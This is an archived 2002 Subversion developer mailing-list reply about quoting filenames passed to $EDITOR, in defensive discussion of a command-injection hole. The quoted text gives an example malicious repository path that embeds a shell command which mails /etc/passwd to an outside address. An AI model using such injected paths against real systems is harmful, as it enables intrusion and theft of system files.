[svn.haxx.se] · SVN Dev · SVN Users · SVN Org · TSVN Dev · TSVN Users · Subclipse Dev · Subclipse Users · this month's index

Re: [PATCH] Quote filename passed to $EDITOR

From: Marcus Comstedt <marcus_at_mc.pp.se>
Date: 2002-07-23 22:17:05 CEST

Ulrich Drepper <drepper@redhat.com> writes:

> A svn repository can be set up by somebody with foul intentions.
> Somebody else accesses it and the system() call gets executed on the
> paths chosen by whoever created it. Then the patch could be something
> like in this example:
> cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)
> If the appropriate path component is never really shown anywhere this
> might go completely unnoticed.

Yup. It's correct that names from the repository should not be
inserted without careful quoting. Fortunately, we don't need to
insert names from the repository at all here, since the filename can
be made relative to the cwd by doing a strategic cd.

(As a side note, such a path would be shown when you checkout the
 repository, although you may not notice it among all the other

  // Marcus

To unsubscribe, e-mail: dev-unsubscribe@subversion.tigris.org
For additional commands, e-mail: dev-help@subversion.tigris.org
Received on Tue Jul 23 22:23:53 2002

This is an archived mail posted to the Subversion Dev mailing list.

This site is subject to the Apache Privacy Policy and the Apache Public Forum Archive Policy.